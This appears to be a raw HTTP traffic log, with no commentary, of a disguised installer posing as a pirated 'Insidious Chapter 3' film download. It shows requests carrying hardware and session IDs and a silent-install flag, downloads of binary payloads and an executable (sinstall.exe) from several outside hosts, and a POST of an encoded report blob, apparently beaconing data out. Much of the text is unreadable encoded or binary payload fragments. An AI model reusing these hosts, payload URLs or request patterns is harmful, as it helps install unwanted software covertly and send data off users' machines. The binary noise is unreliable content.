C.3.f.z.O.l.3.7.V.k.b.9.8.z.s.t.i.0.R.j.q.R.y.1.y.t.B.9.f.Q.S.w.k.f.H.
x.g.8.V.k.U.L.R.H.I.j.1.J.g.n.B.u.D.n.W.v.h.T.R.g.N.d.g.F.Q.C.h.s.S.7.
F.8.3.9.r.o.u.8.L.s.B.K.G.e.C.U.a.j.U.H./.v.R.l.D.M.V.g.0.4.1.K.Y.i.N.
k.L.v.3.J.j.T.3.l.6.o.J.S.6.M.D.N.e./.O.N.t.j.W.0.p.j.3.v.Q.v.c.n.J.8.
p.U.p.0.I.H.6.G.L.g.h.G.r.C.9.s.x.f.5./.d.Y.h.g.y.L.E.U.S.R.W.1.i.o.E.
S.6.X.2./.r.z.a.K.w.Y.q.7.R.I.r.q.M.a. .Z.O.2.c.2.G.y.B.5.k.L.I./.r.q.
R.2./.9.o.m.C.d.c.i.o.G.R.R.w.h.i.g.A.M.x.Q.2.6.A.p.n.2.R.g.H.m.R.C.u.
k.r.F.6.y.M.F.Q.5.Y.A.F.i.V.7.Z.0.g.3.O.G. .n.j.M.p.6.D./.i.D.X.N.C.j.
L.K.5.m.B.U.X.e.X.C.E.w.Y.L.S.m.h.5.y.b.A.u.s.w.a.0.N.M.F.r.F.0.z.C.b.
T.Q.B.X.9.M.I.b.t.M.O.1.7.O.l.D.P.Q.Z.q.9.u.5.F.f.f.q.b.e.D.2.d.u.T.I.
Y.q.j.c.W.z.g.r.3.B.x.X.q.O.M.b.b.M.6.9.V.U.0.1.G.q.s.u.P.Y.c.E.v.k.i.
r.y.L.y./.I.N.y.x.J.x.v.M.Y.U.E.A.N./.4.w.q.9.A.J.Y.2.7.J.v.Q.1.Q.d.Y.
5.m.C.v.d.2.N.i.U.n. .9.3. .l.8.y.m.z.s.x.t.K.o.D.2.l.n.G.i. .w.Q.I.W.
X.z.F.0.z.1./.Y.A.p.c.P.n.2.z.a.g.F.5.t.t.Z.g.o.r.H.5.V.G.U.H.m.q.W.l.
7.B.n.D.B.8.F.b.N.C.E.m.e.c.w.l.5.A.X.R.Y.1.Q.2.6. .W.M.P.9.q.u.U.k.5.
e.9.X.u.e.w.E.0.G.F.E. .E.Y.7.j.b.A.D./.5.s.g.h.R.d.g.u.m.o.9.u.8.G.5.
x.z.n.h.D.4.S.O.U.1.q.e.k.0.A.w.W.j.n.P.o.D.s.Y.U.Y.l.Z.t.H.p.W.1.5.I.
G.R.Z.s.S.y.b.d.7.O.q.9.p.F.y.n.q.P.W.p.T.i.z.o.5.H.t.s. .i.D.E.2.y.v.
a.1.W.W.q.H.N.Y.J./.Y.f. .t.d.u.y.f.g.c.q.y.V.n.O.k.p.L.S.V./.3.q.A.v.
K.Z.s.7.C.R.Z.v.C.U.o.d.E.2.f.z.j.U.R./.Z.R.n.p.l.0.l.b.E.T.I.0.W.B.V.
t.d.n.6.H.2.0. .Q.8.V.N.X.R.7.y.E./.J.C.p.E.W.N.Y./.L.V.u.T.U.y.j.
<<< skipped >>>


GET /?step_id=6&sf=1&installer_id=2249414903470210647&publisher_id=24379&source_id=0&page_id=0&affiliate_id=0&country_code=UA&locale=EN&browser_id=4&download_id=2225208770382696055&external_id=0&tag_id=0&installer_type=IX_2013&hardware_id=8738532578695851691&session_id=16580608941307095478&q=Insidious Chapter 3 2015 HC HDRip XViD-ETRG&q=Insidious Chapter 3 2015 HC HDRip XViD-ETRG&product_name=Insidious Chapter 3 2015 HC HDRip XViD-ETRG&installer_file_name=Insidious Chapter 3 2015 HC HDRip XViD-ETRG&jxbo=1&ttl=1434669534790&self_redirect=0&project_encode_id=24379&enc_u_p=1&enc_u_p=1&enc_u_p=1&st=0&st=0&AddToPayLoad=RunOnceMutex="alpha_installer" RunOnceMutexDuration="0" SilentInstall="<$ifte(~=1,1,0)>"&filesize=&sr=1&iid=2249414903470210647&did=2225208770382696055&installer_only=1&st=0&uuid=%2A HTTP/1.1
Range: bytes=0-
User-Agent: Mozilla/5.0 (Windows NT 6.2; WOW64) AppleWebKit/535.7 (KHTML, like Gecko) Chrome/16.0.912.75 Safari/535.7
Host: c1.goody-best.info
Cache-Control: no-cache


HTTP/1.1 200 OK
Server: ngx_openresty
Date: Wed, 01 Jul 2015 04:53:08 GMT
Content-Type: text/html
Content-Length: 31266
Connection: close
Content-Disposition: attachment; filename="6.txt"
..7.3.8.R.2.X.Z.R.1.u.D.u.2.T.h.O.Q.I.6.p.r.j.W.j.6.3.n.l.F.W.r.v.S.Z.
0. .9.J.b.N.g.L.q.a.8.v.k.r.I.3.N.e.O.x.B.Y.c./.A.5.e.k.2.M.Z.O.x.D.1.
y.d.K.N.w.A.7.S.N.1.S.h.W.P.B.g.k. .2.0.h.K.Q.K.O.9.m.P.y.u.C.v.7.C.1.
O.0.Z.W.7.s.D.i.6.h.a.N.A. .d.9.J.b.r.Z. .v.L.3.N.J.Q.x.N.j.S.b.O.o.l.
/.p.R.F.P.C.h.W.Q.4. .w.z.U.a.Q.Y.b.y.k.x.h.T.y.L.8.Q.y.d.P./.r.o.B.7.
N.t.t.c.I.7.8.U./.u.K.L.d.C.9.j.D.F.i.G.5.N.u.U.V.n.H.s.Q.2.H.j.7.1.D.
j./.9.c.w.r.k. .F.n.m.u.6.7.t.8.H.5.o.S.7.D.V.h.I.Y.4.F.E.Z.8.0.N.a.A.
f.Y.U.u.z.M.l.n.g.E.y.9.k.E.8.q.p.I.d.8. .Y.e.e.2.W.v.I.Z.m.h.l.A. .N.
F.m.Z.7.g.K.3.b.u.K.V.V.s.k.j.7.Y.y.m.U.y.I.C.u.v.M.t.x.j.P.Y.0.b.x.M.
q.4.4.P.o.B.0.6.I.2.M.q.2.9.z.N.V.B.w.Y.B.O.B./.F.s.q.M.B.G.e.V.x.p.p.
M.O.5.m.U.A.M.x.x.9.o.s.0.a.9.n.g.6.j.t.t.R./.Q.J.O.y.3.p.X.4.d.i.M.a.
K.3.7.Y.S.u.L.K.F.B.z.o.5.I.p.6.6.6.3.0.Q.r.B.A.y.I.q.r.j./.a.E.z.S.4.
P.5.5.8.Q. .Y.v.v.n.N.I.l.8.b.R.D.V.r.8.f.z.p.I.V.J.y.E.B.k.O.2.u.2.8.
w.1.i.R.w.G.O.0.7.O.L.F.o.u.F.E.u.r.c.z.6.E.0.i.u.y.R.5.D.O.k.8.O.i.m.
N.l.M.5.D.6.u.T.I.M.d.6.H.1.L.7.i.S.e./.T.M.V.O.5.6.e.e.2.y.j.4.w.L.r.
Q.Y.f.x.q.V.l.s.T.I.O.n.I.a.C.L.0.t.Q.x.r.A.u.7.c.p.k.1.I.u.3.3.J.u.n.
1.6.q.t.M.l.k.5.i.4.a.M.6.c.p.U.Y.8.h.7.R.s.R.J.Y.g.h.U.I. .X./.w.f.H.
K.a.O.r.m.R./.o.y.0.j.X.6.S.K.9.W.0.V.0.I.8.Y.R.f.E.f.W.q.L.S.6.l.b.n.
N.B.7.r.r.r.9.I.4.3.x.f.p.R.K.Z.D.x.X.C.C.Z.c.E.N.c.J.U.C.T.6.H.E.e.1.
s.B.R.J.O.A.2.e.D.8.E.u.2.n.y.T.X.p.y.w.e.F.J.t.j.4.E.r.4.J.G.3.j.e.G.
n.H.K.8.G.A.G.L.c.D.G.C.H.A.l.x.8.d.H.f.Q.L.o.C.a.P.n.m.R.7.e.4.5.V.a.
T.h.w. .w.n.F.L.D.D.V.m.W.H.n.h.T.Z.Y.8.I.U.w.0.2.i.T.x.r.Q.S.U.z.
<<< skipped >>>


GET /?step_id=6_2&sf=1&installer_id=2249414903470210647&publisher_id=24379&source_id=0&page_id=0&affiliate_id=0&country_code=UA&locale=EN&browser_id=4&download_id=2225208770382696055&external_id=0&tag_id=0&installer_type=IX_2013&hardware_id=8738532578695851691&session_id=16580608941307095478&q=Insidious Chapter 3 2015 HC HDRip XViD-ETRG&q=Insidious Chapter 3 2015 HC HDRip XViD-ETRG&product_name=Insidious Chapter 3 2015 HC HDRip XViD-ETRG&installer_file_name=Insidious Chapter 3 2015 HC HDRip XViD-ETRG&jxbo=1&ttl=1434669534790&self_redirect=0&project_encode_id=24379&enc_u_p=1&enc_u_p=1&enc_u_p=1&st=0&st=0&AddToPayLoad=RunOnceMutex="alpha_installer" RunOnceMutexDuration="0" SilentInstall="<$ifte(~=1,1,0)>"&filesize=&sr=1&iid=2249414903470210647&did=2225208770382696055&installer_only=1&st=0&uuid=%2A HTTP/1.1
Range: bytes=0-
User-Agent: Mozilla/5.0 (Windows NT 6.2; WOW64) AppleWebKit/535.7 (KHTML, like Gecko) Chrome/16.0.912.75 Safari/535.7
Host: c1.goody-best.info
Cache-Control: no-cache


HTTP/1.1 200 OK
Server: ngx_openresty
Date: Wed, 01 Jul 2015 04:54:01 GMT
Content-Type: text/html
Content-Length: 8236
Connection: close
Content-Disposition: attachment; filename="6_2.txt"
..t.Q.p.4.H.k.g.B.4.Z.N.N.v.w.P.F.H.w.D.j.Q.d.h. .M.7.q.P.8.r.V.x.S.o.
v.M.T.N.Z.y.2.5.Y.E.q.L.P.I.S.7.d.F.N.r.l.G.i.G.n.R.q.N.g.u.K.Z.2.1.a.
M.h.f.d.U.i.u.8.U.z.U.B.n.X.H.n.8. .d.7.r.H.O.y.I.N.Y.b.U.h.5.W.y.O.O.
T.w.D.E.Y.B.P.5.1.b.9.T.R.V.6.g.3.I.x.r.L./.C. .m.1.5.7.i.T.x. .6.A.i.
N.u.P.L.i.z.R.W.d.E.t.V.H.5.R.W.7.I.z.3.H.L.z. .o.C.v.Z.N.G.D.Z.9.e.a.
k.C.p.x.a.C.5.q.z.p.e.C.Z.5.c.0.C.S. .p.I./.z.Z.Z.F.R.n.F.F.g.V.t.R.I.
f.q.V.j.U.O.4.V.t.v.H.K.W.z.Q.1.Z.8.m./.1.q.J.G.G.3.S.Y.X.s.E.g.6.g.E.
R.S.G.9.4.N.d./.K.1.u.x.w.n.E.A.I.O.3.w.B.W.Y.a.8.T./.R.l.G.v.D./.1.S.
f.M.S.A.B.l.M.u.k.m.M.a.5.c.k.g.p.m.u.P.Y.q.a.g.6.N.3.V.S.c.C.b.4.2.E.
k.4.l.Y.X.p.p.o.I.r.i.w.H. .D. .I.R.O.T.T.x.m.T.8.4.C.N.t.2.V.3.I.W.Z.
j.G.A.3.L.D.7.n.Y.X.5.i.m.T.L.O.U.I.E.t.9.p./.e.X.u.R.P./.N.X.g.N.h.H.
Z.j.u.5.K.z. .y.V.6.y.P.K.G.v.w.9.h.2.6.v.j.0.x.P.k.H.v./.t.A.l.m.i.w.
t.U.a.F.h.k.H.a.l.W.T.s.z.f.z.c.i.n.9.S.6.U.0.7.2.g.4.c.E.f.3.O.e.2.d.
K.a.U.z.N.r.4.e./.8.T.W.s.8.c.T.D.M.o.V.D.r.8.X.T.3.0.0.P.C.3.G.n.C.o.
 .n.t.z.i.H.i.2.6.j.h.D.8.X.u.X.B.c.p.V.a.m./.i.V.g.X.5.7.G.0.q.G.f.C.
6.X.a.e.o.q.E.h.w.i. .v.B.Z. .z.G.m.4.w.Y.Q.D.A.R.2.N.Y.H.w.k.L.z.G.x.
k.i./.F.e.h.A.V.i.U.M.w.y.1.u.4.e.h.C.G.I.r.W.Q.I.0.J.U.P.8.h.E.M.F.X.
5.v.4.l.U.2.B.X.Y.9.x./.G.9.1.b.t.U.2.A.b.u.r.u.v.k.Q.Q. .y.F.t.G.d.E.
D.l.N.G.x.8.J.D.7.S.L.Y.a.U.O. .Z.h.T.J.c.c.k.E. .0.0.r.a.l.I.T.d.9.A.
S.R.2.h.n.V.Q.6.K.i.e.5.O.C.Y.V.G.o.Q.4.f.9.l.A.b.M.A.V.c.2.p.0.9.d.7.
F.4.n.s.A.B.w.q.4.z.A.3.7.Q.m.P.A.6.i.C.d.K.8./.C.w.y.O.I.4.e.Y.I.x.2.
K.4.h.Q.j.p.d.u.R.y.C.P.X.E.Q.g.d.Z.6.8.F.X.n.L.U.r.q.G.l.1.h.s.w.
<<< skipped >>>


GET /?step_id=6_2_1&sf=1&installer_id=2249414903470210647&publisher_id=24379&source_id=0&page_id=0&affiliate_id=0&country_code=UA&locale=EN&browser_id=4&download_id=2225208770382696055&external_id=0&tag_id=0&installer_type=IX_2013&hardware_id=8738532578695851691&session_id=16580608941307095478&q=Insidious Chapter 3 2015 HC HDRip XViD-ETRG&q=Insidious Chapter 3 2015 HC HDRip XViD-ETRG&product_name=Insidious Chapter 3 2015 HC HDRip XViD-ETRG&installer_file_name=Insidious Chapter 3 2015 HC HDRip XViD-ETRG&jxbo=1&ttl=1434669534790&self_redirect=0&project_encode_id=24379&enc_u_p=1&enc_u_p=1&enc_u_p=1&st=0&st=0&AddToPayLoad=RunOnceMutex="alpha_installer" RunOnceMutexDuration="0" SilentInstall="<$ifte(~=1,1,0)>"&filesize=&sr=1&iid=2249414903470210647&did=2225208770382696055&installer_only=1&st=0&uuid=%2A HTTP/1.1
Range: bytes=0-
User-Agent: Mozilla/5.0 (Windows NT 6.2; WOW64) AppleWebKit/535.7 (KHTML, like Gecko) Chrome/16.0.912.75 Safari/535.7
Host: c1.goody-best.info
Cache-Control: no-cache


HTTP/1.1 200 OK
Server: ngx_openresty
Date: Wed, 01 Jul 2015 04:55:12 GMT
Content-Type: text/html
Content-Length: 4214
Connection: close
Content-Disposition: attachment; filename="6_2_1.txt"
..1.Q.v.c.E.m.j.2.W.v.j.x.2.w.t.8.9./.j.7.c.g.C.X.d.x.d.E.5.u.r.N.2.3.
u.5.P.t.Q.u.4.i./.M.S.M.P.9.3.n.m.4.M.H.f.T.g.n.S.k.c.X.Z.1.1.9.0.o.N.
P.i.H.d.B.K.2.X.M.e.6.y.a.R.A.O.E.5.T.u.Z./.4.V.B.J.O.S.X.d.H.4.4.p.T.
A.2.y.B.j.n.a.5.s.y.f.B.b.Q.S.k.P.5.u.h.U.x.6.P.T.m.i.z.J.6.C.U.Q.l.T.
W.T.Y.E.p.t.O.x./.2.Q.L.b.w.T.v.K.l.z.x.y.C./.J.i.D.u.m.N.w.D.l.M.6.L.
b.G.K.V.8.2.C.w.R.7.E.E.j.8.v.a.k.a.0.H.n.Z.U.F.d.M. .o.u.g.C.8.4.k.I.
k.v.P.U.c.e.6.C.7.H. .x.9.w.J.7.o.z.L.b.G. .c.9.u.5.M.T.g.Q.b.Q.5.3./.
Y.q.O.6.n.2.s.H.3.s.T.u.K.V.F.N.1.p.b.x.Y.8.H.o.G.5.Q.T.W.R.M.C.F.N.8.
6.d.Y.Z.k.n.2.I.E.E.I.z.I.L.v.l.z.W.P.A.Q.i.k.3.u.b.Y.X./.N.J.F.O.v.Q.
W.n.i.q.v.n.n.5.e.L.O.Z.7.o.a.c.p.I.f.X.4.6.N.d.e.7.l.Q.Y.U.L.R.y.K.u.
s.Z.M.f.U.i.n.U.t.c.D.a.Q.q.D.v.n.l.P.E.q.M.r.O.h.W.7.8.C.Z.w.g.9.x.X.
h.o.D.Q.h.S.8.9.3.O.s.i.x.p.x.2.8.M.W./.5.g.2.q.8.r.A.w.4./.l.C.V.t.2.
f.O.f.n.a.u.V.N.B.h.g.B.K.A.g. ./.i.P.A.0.k.U.g.9.u.Q.A.p.V.8.S.z.T.K.
c.Y.C.6.n.4.K.K.M.G.Q.X.7.E.a.c.i.7.F.E.7.Z.p.L.H.I.w.x.8.I.w.Q.m.s.C.
e.Z.n.9.U.U.r.R.q.L.v.K.z.A.h.b.q.1.j. .X.u.G.3.5.R.U.L.w.r.3.t.k.z.h.
C.9.P.Y.K.P.Z.V.H.z.D.k.a.A.z.d.A.v.Q.H.T.R.i.i.g.t.O.f.p.F.0.z.5.G.R.
k.5.d.7.f.v./. .J.I.g.9.L.N.R.j.k.W./.o.d.t.9.9.C.i.C.6.t.I.X.5.C.J.A.
K.2.7.N.D.I.r.q.d.F.1.U.w.1.9.s.B.9.O.v.Z.s.u.q.G.F.7.7.6.0.O.W.O.j.4.
J.M.V.j.y.4.A.V.i.a.K.R.P.u.H.R.e.F.w.6.0.O.B.F.L.R.V.M.6.G.m.W.E.A.Z.
/.j.6.P.h.4.S.P.A.8.8.N.W.2.I.s.F.q.t.y.1.B.z.q./.K.e.U.r.X.g.f. .4.6.
w.d.p.U.l.7.8.f.G.U. .f.d./.B.k.h.x.X.Y.7.B.S.0.l.a.t.J.a.O.9.H.1.h.a.
b.u.D.E.C.W.M.q.i.I.y.A.w./.U.5. .A.Z.0.k.b.V.K.0.g.V.z.D.p.Q.M.A.
<<< skipped >>>


GET /?e=bsp&clsb=1&publisher=24379&country=UA&dd=5&cid=334&vn=158&ind=2249414903470210647&exid=0&ssd=16580608941307095478&hid=8738532578695851691&osid=501&channel=0&sfx=2&ne=1&jc=1&mb=1&install_date=20140701&cha=0 HTTP/1.1
Range: bytes=0-
User-Agent: Mozilla/5.0 (Windows NT 6.2; WOW64) AppleWebKit/535.7 (KHTML, like Gecko) Chrome/16.0.912.75 Safari/535.7
Host: multipledirect.ru
Cache-Control: no-cache


HTTP/1.1 200 OK
Server: ngx_openresty
Date: Wed, 01 Jul 2015 04:53:55 GMT
Content-Type: application/octet-stream
Content-Length: 524274
Connection: close
Content-Disposition: attachment; filename="fyBYRfMAYKA66R.ca"
Content-Transfer-Encoding: binary
Access-Control-Allow-Origin: *
..z.....B{...............H...H......D.=.........v#..o}..-)..!........M
..jU..K...l..6...,>..:...9Z..H...A.......L..q4..D2..iz..%....J...4.
......Y.7...(g..>s..@{..JF..NZ...V...[.9e..}$..y=..Pv..[...]...x...
EV..y..<j.."w..L...QB..CX...R...T.....>d.. i..Nq..O|..bW...L...Q
..fY. ...=n..xc.. ~...H...K..G...S..(...!1..d'..8...RY...;...H...V..v.
.<j..,|..!...<....O..tW..dZ..o..#|..xi..Ao..&|...J...I..A...U..*
...#7..f!..:.......NY...V...[.7...*'..<u..?`..N...G.......J...2..Nu
..5-..em..$B...D...*...=.....3...."..6z..,........I..nQ..p..v!..-...5n
..6{...^..D...]......{0..}[email protected]~..4r..:...DG
.._O..FI...Z.....3... *..3'..;d..CD..HY...T...R.w}..l9..f=..2.......^.
...<.....'7../p..2~..-....=...F...U..M...)......' ..b-..>(......
OE...Z.....C...6l..6z..*..............._..m*..&>..`1..h2.......K..h
S..P^.'.../p..2~../........M..jU..]...l..?...<|..&...<U...=.....
.U...P..(4..~ ..f8..",...A..vI..RN...<.Xc..zk..}b.. {...H...6......
.P.xt..2h..2~../....!...)...H..Q...g..\o..=b..1...9Z...D...*...O.....#
|..b-..{8..0,..V...^........Y.2...(6..5>..=f...H...K..G...S..(...!1
..d'..8.......G_..V...L...h..ta..k$..xx..l[.......J..RZ..s..> ..o:.
.z~..nw..A...BN.......Y.5...-6..>s..@{..K....%...N...P.bw..2h..<
u..B}..p3...-...H...V..y..<j.."w..L...p....9......U...P..(4..~ ..f8
..",...A...T..Z...S..Jh..q>..g&..R`.._H...6...5.....Ze..|m..jb.."x.
..N...0.......].....$...):..,>..}...H@..\Y..S...P.. 4.. i..3l..r=..
K.......F...N..J8..w`..'...=3.......V..SV..WE.:$..k>..~z..js..E
<<< skipped >>>


HEAD /addons/sinstall.exe HTTP/1.1
Accept: */*
Accept-Encoding: identity
User-Agent: Mozilla/5.0 (Windows NT 6.2; WOW64) AppleWebKit/535.7 (KHTML, like Gecko) Chrome/16.0.912.75 Safari/535.7
Pragma: no-cache
Expect: 100-continue
Host: i1.scanwebresolver.com
Connection: Keep-Alive


HTTP/1.1 100 Continue
HTTP/1.1 200 OK..Server: openresty..Date: Wed, 01 Jul 2015 04:55:14 GM
T..Content-Type: application/octet-stream..Content-Length: 1085440..La
st-Modified: Wed, 04 Feb 2015 13:58:06 GMT..Connection: close..ETag: "
54d2256e-109000"..Accept-Ranges: bytes..



POST / HTTP/1.1
Range: bytes=0-
User-Agent: Mozilla/5.0 (Windows NT 6.2; WOW64) AppleWebKit/535.7 (KHTML, like Gecko) Chrome/16.0.912.75 Safari/535.7
Host: r1.the-invention.org
Content-Length: 5998
Cache-Control: no-cache

data=4hUxCFbegoHZp34567yEl&report=Ybk79iZRZdw4WMPHwyTBrK6KHsoau9uwVsAOVy/MzQAcIXkQxSglS131JAsyvoEJNT6ZW0YJNPp0DFdPYmkehHyRGNPVt4ZhejkGjVIgHBf25unVVe9Y7O9kxVaW94sj9Y/YFRXES2DGbxEKtENa5KV xVn42Z3ufm0bn6t29AeWjaPYa4Vc MV4sO3TJ/KFZcEmFL5HOQM9SoVeBScasmPsVJftvIRU9l//Tc/ oKrHv6lAQQzKO10K5szW0c5cTObz6GlihFziTSq6Zgh0f8h9Yppf9wp2HXE7EB9zFve38MfuDXR6rhDQO/n1di43TGPWQ4HNFKHxrVMd0MnF/Vdicc24wLcq4ILBiXuO5yij58LxT7RqYKVT5hkEebv5nUd7Lebgo10MKh9/cUnCEFbnHuKVQ0thBl7TEFtbrInAj6 e3Vy6fqFRkVsp8 aKNSZEukqkDiMTW4TFJ1eypYGPLbMk3JVwOfVaeXcYS8HXCET5KeSV8xjpLksaLJyJRcnSiz6wEgCcBP3wdvITes vHhUpCn1r4IkaD5PzyKfanIy6PMFaX1IvVV2DTUd7xsN0ENELfo1XyT2LS4YiV64O1rgthy4cXwE1b6bZuHgyf9 ybjWcBEJJAQbN/UcHNemTyckhBB/0JvmDdqgyQyCQSsi1n4aScyJvjqTkntGVnzu2bHc/ OBM0I90aeaT1FalZKIr9VNaUIsvzmeZLl7iLlt Fz1bF8S4qh9SQaYCCSArBdzW2Fy8q9R/ulTQJX DyQZLOBuLPiZ1BRgZ/IJJPwyyMg28zVxUeslGvwKNkCAW8S51tR1WI75/nz12p6Xwlt8Gfm2V1Y2QyGJ53hM/4wV3NE6Nbyk9hXyR0w8PcVoZw8q5UTqll MORPm42L3oC//TacRF2jF6cSDaU JtSt9lDweTSv8c3YSEcg9SaDx2V  6E2cmQMVqJR7S6Xbx3MPEqT/hFXn5rXCVHY9VwSYPMp6mS6pXk/xNdpMSg5d14xx9IqVSH9N8brrC30q1Ek h12IF8FmIlYa tHCflb2ieTcAuEWvJflXyWOmAjnKVzErTGNydVcFoeyT ytH5ZPmiiVqgam1uRgeieBNeSDVXc/yKT/W 8qvSkvfrCpCkjEoEgSrpqwB2wPrTG77N0pr/sfbjQz/NNKmYUWVFVXZpucETPgjccl65g58y2GjmWjSj4VMfCPpGEAdHjl1CJjlvisyScESGl11ObgnXZw3 CaDeCILByaZRDQpscMWQ0yjf8/C
HTTP/1.1 200 OK
Server: ngx_openresty
Date: Wed, 01 Jul 2015 04:53:51 GMT
Content-Type: application/json; charset=UTF-8
Content-Length: 2
Connection: close
{}..



GET /?step_id=7&sf=1&installer_id=2249414903470210647&publisher_id=24379&source_id=0&page_id=0&affiliate_id=0&country_code=UA&locale=EN&browser_id=4&download_id=2225208770382696055&external_id=0&tag_id=0&installer_type=IX_2013&hardware_id=8738532578695851691&session_id=16580608941307095478&q=Insidious Chapter 3 2015 HC HDRip XViD-ETRG&q=Insidious Chapter 3 2015 HC HDRip XViD-ETRG&product_name=Insidious Chapter 3 2015 HC HDRip XViD-ETRG&installer_file_name=Insidious Chapter 3 2015 HC HDRip XViD-ETRG&jxbo=1&ttl=1434669534790&self_redirect=0&project_encode_id=24379&enc_u_p=1&enc_u_p=1&enc_u_p=1&st=0&st=0&AddToPayLoad=RunOnceMutex="alpha_installer" RunOnceMutexDuration="0" SilentInstall="<$ifte(~=1,1,0)>"&filesize=&sr=1&iid=2249414903470210647&did=2225208770382696055&installer_only=1&st=0&uuid=%2A HTTP/1.1
Range: bytes=0-
User-Agent: Mozilla/5.0 (Windows NT 6.2; WOW64) AppleWebKit/535.7 (KHTML, like Gecko) Chrome/16.0.912.75 Safari/535.7
Host: c1.goody-best.info
Cache-Control: no-cache


HTTP/1.1 200 OK
Server: ngx_openresty
Date: Wed, 01 Jul 2015 04:55:13 GMT
Content-Type: text/html
Content-Length: 8398
Connection: close
Content-Disposition: attachment; filename="7.txt"
..r.0.B.Q.b.W.Y.J.U.A.m.z.C.3.x.u.r.p.E.e. .q.P.8.F.S.v.X.y./.W. .1.7.
X.o.7.P.O.J.I.T.9.P.s.v.R.M.S.4.n.v.d.m.L.L.2.j.O.5.F.S.G.O.h.e.R.p.6.
t.f.t.U./.T.6.P.Y.j.P.U.S.r.p.5.Y.k.B.r.M.l.0.O.y.c.F.R.X.h.g.y.h. .c.
P.H.K.w.3.e./.Q.c.b.H.v.d.3.5.k.F.M.G.m.C.j.Z.g.D.X.5.D.B.h. .F.S.V.h.
O.p.U.L.I. .5.Z.0.L.O.E. .8.Z.0.1.f.u.m.M.j.a.2.J.Y.4.k.y.d.B./.I.4.v.
H.g.6.9.Z.Y.J.a.4.Q.E.8.5.R.D.h.e./.v.b.k.Y.Z.k.R.9.a.a.H.m.E.z.N.R.v.
3.E.w.r.H.j.I.z.X.a.G.7.w.9.K.Y./.q.B.r.r.t.r.D.l.5.6.a.h.B.X.I.b.A.i.
k.v.3.H.Q.W.J.m.m.l.d.O.u.f.X.r.0.1.Y.1.t.w./.1.x.s.v.S.T.Z.E.G.2.l.n.
E.x. .a.V.S.R.9.W.c.q.j.B.x.A.s.x.h.i.9.B.m.N.i.8.Y.I.j.1.D.i.N.I.r.8.
L.L.5.o.g.m.k.f.4.M.9.K.I.G.6.k.z.u.u.L.F.G.L.K.5.S.o.7.3.w.6.s.r.M.U.
T.h.Z. .G.t.H.Y.W.X.b.G.O.z.M.X.X.J.j.l.q.S.R.T.c.x.N.C.Z.Y.M.W.j.g.n.
g.D.1.H.m.o.p.I.q.F.5.4.j.u.7.R. .c.a.W.V.i.y.T.d.U.w.o.a.a.M.1.c.o.C.
K.J.3.t.G.2.7.N.w.a.C.k.a.g.9.D.l.G. .c.H.x.x.X.t.Z.e.6.h.V.q.D.2.X.i.
C.y.M.G.r.0.z.q./.n.R. .w.l.B.S.t.h.X.q.w.C.t.3.6.V.4.r.C.u.z.l.X.7.r.
1.P.r.8.I.H.E.0.s.w.F.z.N.g.3.v.Y.X.Y.Q.q.M.o.Z.I.M.8.E.9.L.C.h.X.M.Z.
W.i.Z.g.P.o.z.K.F.P.o.b.t.0.7.1.X.q.J.Q. .a.H.c.l.r.K.0.N.T.s.I.e.E. .
 .L.3.X.r.J.X.F.j.o.y.W.x.W.c.9.8.f.1.V.7.p.6.7.3. .S.Y.h.q.b.a.G.d.S.
4.S.e.Q.V.G.A.z.w.Z.y.x.X.x.c.b.A.r.J.l.L.D.R.e.5.g.f.e.H.a.k.I.K.t.u.
e.1.u.m.M.E.l.Z.5. .w.7.H.Z.M.k.o.a.9.p.C.l.7.N.y./.v.t. .I.c. .I.v.m.
f.m./.Z.s.g.E.N.P.k.z.O.G.f.l.O.Y.9.H.H.w.7.E.9.4.M.n.V.C.A.T.J.i.k.Y.
X.w.9.T.c.x./.m.U.u.h.I.q.L.4.9.f.i.d.k.F.Z.Y.s.4.u.n.f.k.F.M.2.3.W.M.
t.8.C.1.M.a.y.9.h.P.4.G.j.k.H.C.n.g.0.n.P.t.A.w.2.q.B.p.L.3.i.6.2.
<<< skipped >>>


GET /2052/TerminusKeeper_143462550383614.ca HTTP/1.1
Accept: */*
Accept-Encoding: identity
User-Agent: Mozilla/5.0 (Windows NT 6.2; WOW64) AppleWebKit/535.7 (KHTML, like Gecko) Chrome/16.0.912.75 Safari/535.7
Pragma: no-cache
Expect: 100-continue
Host: artstickerios.info
Connection: Keep-Alive


HTTP/1.1 100 Continue
HTTP/1.1 200 OK..Server: openresty..Date: Wed, 01 Jul 2015 04:54:04 GM
T..Content-Type: application/octet-stream..Content-Length: 3439893..La
st-Modified: Thu, 18 Jun 2015 08:40:11 GMT..Connection: close..ETag: "
558283eb-347d15"..Accept-Ranges: bytes....z..}4............B.....|4...
:.....n.-=.|4......w..![:......#7Qe&..*..@7F.....;..T.9s..f ...I8..1..
.[.RpG]q....5....."c ...gVY.%.j.....b.BY _3A._./...r.T.{}..;.A.ui-...U
.?..K...L.Iv......s...4.............. .....dM......tS...g....4. ....Y.
3.p....{[email protected].]..S`D>.Vd.......%......p.j..a.TH..
.Y.....Q..D.sCC.*#...y..Em.........SK.-./U.`d7MM.....~..w:..H[hR......
?<..T\.;QG'9..........v!..n"(..g].....@..#D".9.nH.....:.T.5f..O..{G
....V..]..=...ey..w...%..pVp.,K.d:..!Y.U)i..G.,....gCX........L..?...&
.....N2.E..$Ul..........#A.e..&.KS.,.:.Y~`..T.r...K....2.....h^..:....
..g.?........i..h..D...kp%....|t....<0a..l9....cN..u.d...<.u._(.
1c..W.-....Wj......Y(&S...|.....BfFv.l..v<;.~....Wn...n-.)..U..|f2.
.u........T.z.8.....\..mx6....f..[..M...f4.....0........5.....i.......
*gnr....l.(...M....Pf........B..iR......U...6..Gp?......b....~.2..e-..
.i^..S...1..B.. .OW........Fl...^t.`..(s.$..3w.<..Bn3S.O..nCr..]...
.mvuc...5<.?..I...[T:&.n.....4R.C..]K.......(.....F.....Lt......4.)
..Q.<..$VC.:.f~D...dH/...(.. ...j2?.Z..L..((?......M...$.4.......E.
.v.........-.rf.e6...v.....dz....t.....x..&.......(.&}..>....8...|.
0.9V.&..Qo.:......m...r.8........~d.Fzq~.w.W.;...A.....%.Q..5>r.>
;3..i..Z..g.....R....l.<....O.0}.....=..p...m....Go.1../'u.._..
<<< skipped >>>


HEAD /2052/TerminusKeeper_143462550383614.ca HTTP/1.1
Accept: */*
Accept-Encoding: identity
User-Agent: Mozilla/5.0 (Windows NT 6.2; WOW64) AppleWebKit/535.7 (KHTML, like Gecko) Chrome/16.0.912.75 Safari/535.7
Pragma: no-cache
Expect: 100-continue
Host: artstickerios.info
Connection: Keep-Alive


HTTP/1.1 100 Continue
HTTP/1.1 200 OK..Server: openresty..Date: Wed, 01 Jul 2015 04:54:03 GM
